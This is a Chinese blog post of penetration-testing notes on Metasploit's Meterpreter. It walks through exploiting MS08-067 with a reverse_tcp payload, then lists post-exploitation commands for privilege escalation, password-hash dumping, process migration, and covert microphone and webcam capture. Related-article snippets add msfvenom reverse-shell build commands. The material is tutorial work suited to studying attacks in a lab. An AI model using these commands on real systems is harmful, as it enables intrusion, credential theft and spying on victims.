【渗透测试笔记】之【MSF Meterpreter Payload】_meterpreter的payload有哪些

于 2024-05-13 10:43:15 发布
阅读量141 收藏
点赞数 1
分类专栏: 程序员 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968529/article/details/138792526
版权
  • 高级、动态、可扩展的payload。
  • 完全基于内存的DLL注入式payload(不写硬盘)。
    将自身注入系统进程并建立stager。
    基于stager上传和预加载DLL进行扩展模块的注入(客户端API)。
    基于stager建立的socket基础上再建立加密的TLS/1.0通信隧道。
    利用TLS隧道进一步加载后续扩展模块。(避免网络取证)
  • 服务器使用C语言编写。
  • 客户端提供基于Ruby的全特性API(支持任何语言)。

使用ms08-067漏洞演示获取meterpreter shell

root@kali:~# msfconsole
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130
msf5 exploit(windows/smb/ms08_067_netapi) > show targets
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options
msf5 exploit(windows/smb/ms08_067_netapi) > run -j
msf5 exploit(windows/smb/ms08_067_netapi) > sessions
msf5 exploit(windows/smb/ms08_067_netapi) > sessions -i 1
# 获取到meterpreter session
meterpreter >

常用命令

# 保留session,返回msf
meterpreter >background
# 帮助
meterpreter >help
# linux移植命令(cd、ls、ps、cat、pwd、dir、mkdir、mv、rm、rmdir、edit(vi)等)
meterpreter >pwd
# lpwd查看本机当前工作目录



# 查看shell当前的uid
meterpreter >getuid
# 获取当且shell注入进程的pid
meterpreter >getpid
# 查看所有进程
meterpreter >ps
# 迁移到其它进程(跟进程id,一般迁移到explorer.exe)
meterpreter >migrate 652




# 查看当前用户权限
meterpreter >getprivs
# 获得system权限
meterpreter >getsystem
# hashdump获取账户密码哈希值
meterpreter >hashdump
# 杀死某个进程
meterpreter >kill 1524
# 获得目标shell
meterpreter >sehll
# 搜索目标主机上的文件
meterpreter >search -f win.ini



# 查看arp缓存
meterpreter >arp
# 查看开放端口
meterpreter >netstat
# 查看ip
meterpreter >ifconfig
# 路由表查看及更改帮助
meterpreter >route
meterpreter >route -h



# 查看空闲时间(没有进行操作的时间)
meterpreter >idletime
# 导入一个meterpreter操作文件
meterpreter >resource -r 1.txt



# 记录麦克风
meterpreter >record_mic
# 查看可使用的摄像头
meterpreter >webcam_list
# 每隔两秒拍一张照片
meterpreter >webcam_snap -i 2 -v false



meterpreter >lpwd
# 在本机进入某个目录
meterpreter >lcd /root/Desktop
# 在前台运行命令(后台运行为bgrun),按两下tab查看可用命令



## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/61b0e17f73e29c01e89424930ff2b338.png)

![img](https://img-blog.csdnimg.cn/img_convert/644769fc1266d650ded5916790dd46ba.png)

![img](https://img-blog.csdnimg.cn/img_convert/1bdcb37e3f46ca5a535bf04d20e41025.png)

![img](https://img-blog.csdnimg.cn/img_convert/19abe608049af4f8510f117eca7f0cc9.png)

![img](https://img-blog.csdnimg.cn/img_convert/b77f36ba99f13a7e7488929e95d01170.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84968529
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF基本使用(基本结构与payload演示)
`or 1 or 不正经の泡泡
03-19 5835
文章目录前言环境基本结构基本专业术语物理结构逻辑结构使用流程渗透基本流程 前言 试个水(Let’s see if we can pass it)最近做一个爬虫项目,手又痒了。 MSF 是一个非常主流的渗透框架,里面包含了相当多的渗透探测模块 环境 Kail 2020 VM 16 主机:Windows 10 基本要求: 严格遵守国家安全法律法规,会使用Linux。 基本结构 基本专业术语 在玩这个之前呢,我们还是需要去先了解一下一些基本的专业术语的 渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试
msfvenom常用脚本生成
03-19 328
1、 Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe 2、Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> ...
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
cc123489ll的博客
05-09 1154
l, --list <type> 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload <payload> 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format <format> 指定输出格式-e, --encoder <encoder> 指定需要使用的encode,指定需要使用的编码。
Metasploit(四)--Msfpayload命令
weixin_33910759的博客
08-27 1437
原文:http://www.360doc.com/content/15/0123/00/597197_442974311.shtmlmsfpayload即将在2015年6月18日弃用,用msfvenmon替代msfpayload-hmsfpayload的帮助信息。msfpayload-l|grepwindows msfpayload-l|greplinux ...
生成常用的msf
weixin_34268310的博客
01-08 229
生成msf常用payload msf作为一款强大的漏洞检测工具,如何生成适用于msfpayload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成的payload列表: msfvenom -l 生成二进...
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4557
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
MeterpreterMetasploit 框架中的一个高级交互式后渗透工具,它允许渗透测试者在成功利用漏洞后与目标系统进行深度交互,执行多种高级操作。在网络安全和渗透测试领域,Meterpreter 是一种非常重要的工具,因为它...
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架...下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
69-69.渗透测试-Linux安装MSF.mp4
最新发布
05-10
69-69.渗透测试-Linux安装MSF.mp4
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
标题中的“MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑”表明这是一个与Matlab编程相关的项目,具体是使用均值平移(Meanshift)算法来实现图像平滑处理。这个算法在图像处理领域常用于...
msf payload php,msfpayloadmsfencode的介绍_91Ri.org
weixin_32023449的博客
03-11 431
网上说用msfpayload 生成什么注入进程什么攻击后门,后边的注入进程是吓唬人的,就是一种进程隐藏技术不理解没关系(解释一下:进程注入是指将可恶意的可执行代码注入到一个已经运行的进程一般是合法系统进程,达到来隐藏自身的目的。msfpayload 这个工具主要的功能就是将Metasploit 中的 payloads(工具载荷)包装成一个可执行的文件,或者包装成指定的类型,msfpayload可以...
MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 7422
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
生成msf常用payload
hl1293348082的专栏
04-07 2589
msf作为一款强大的漏洞检测工具,如何生成适用于msfpayload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成的payload列表: msfvenom -l 正在上传…重新上传取消 生成二进制文件 关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。 Windows ms
msf下的各种生成payload命令
weixin_48450741的博客
06-15 330
msf下的各种生成payload命令 来自 : https://www.cnblogs.com/backlion/p/6000544.html
MSF使用1
xhscxj的博客
06-12 3444
进入kali中文件,将原有的源注释掉,换上清华的源 进行更新msf:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等) :漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类 :攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 :后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等 :编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过
msfvenom制作payload
anan2175的博客
05-24 247
windows msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe mac msfvenom -a x86 --plat...
Metasploit Framework(MSF)的使用
热门推荐
谢公子的博客
03-01 2万+
目录 Metasploit Metasploit的安装和升级 MSF中加载自定义的exploit模块 漏洞利用(exploit) 攻击载荷(payload) Meterpreter MS17_010(永恒之蓝) Auxiliary辅助探测模块 Exploit漏洞利用模块 Payload攻击载荷模块 后渗透阶段 Post后渗透模块 查看主机是否运行在虚拟机上 关闭杀毒...
Meterpreter扩展模块深度解析:功能与优势
"MSF Meterpreter扩展模块命令详解文档主要介绍了Meterpreter的概念、功能以及技术优势。MeterpreterMetasploit框架中的一个重要组件,用于溢出攻击后的后续控制,提供了一个强大的后渗透工具集。" Meterpreter是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值